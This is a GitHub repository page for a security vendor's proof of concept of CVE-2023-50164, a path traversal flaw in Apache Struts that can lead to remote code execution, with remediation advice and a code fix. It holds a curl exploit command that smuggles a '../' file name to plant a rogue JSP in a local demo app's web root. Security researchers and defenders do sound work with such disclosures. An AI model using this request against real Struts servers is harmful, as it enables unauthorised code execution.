Skip to content

snyk-labs/CVE-2023-50164-POC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

This is a Proof of Concept (PoC) for CVE-2023-50164, which outlines a new path traversal vulnerability which can lead to Remote Code Execution (RCE) in struts-core.

To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of Henrik Plate found here.

Run the PoC

There are two maven profiles in this project: vuln and no-vuln. vuln is the default.

To run with the RCE vuln, execute the following:

mvn clean jetty:run -P vuln

To run without the RCE vuln, execute the following:

mvn clean jetty:run -P no-vuln

The difference between the two profiles is vuln uses struts-core version 6.3.0.1 (which has the path traversal vulnerability) and no-vuln uses struts-core version 6.3.0.2 (which does not have the path traversal vulnerability)

Exploit the Vuln

while running the vuln profile described above, execute the following:

curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"

You'll be able to see the file rogue.jsp in the src/main/webapp folder and you can browse to it at: http://localhost:9999/struts-vuln-poc/rogue.jsp (you'll see a Ya been PWNED! message).

There is a code fix solution that works with the older Struts versions, but, it is still highly advised to update your version of Struts.

To exercise the code fix, execute the following:

curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"

You'll see an error message: Attempted path traversal attack

NOTE: If you use the no-vuln profile, you won't get an error message from the /upload-no-vuln endpoint, even if you use a relative path like: ../src/main/webapp/rogue.jsp, as the new version of struts automatically strips away relative path references.

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published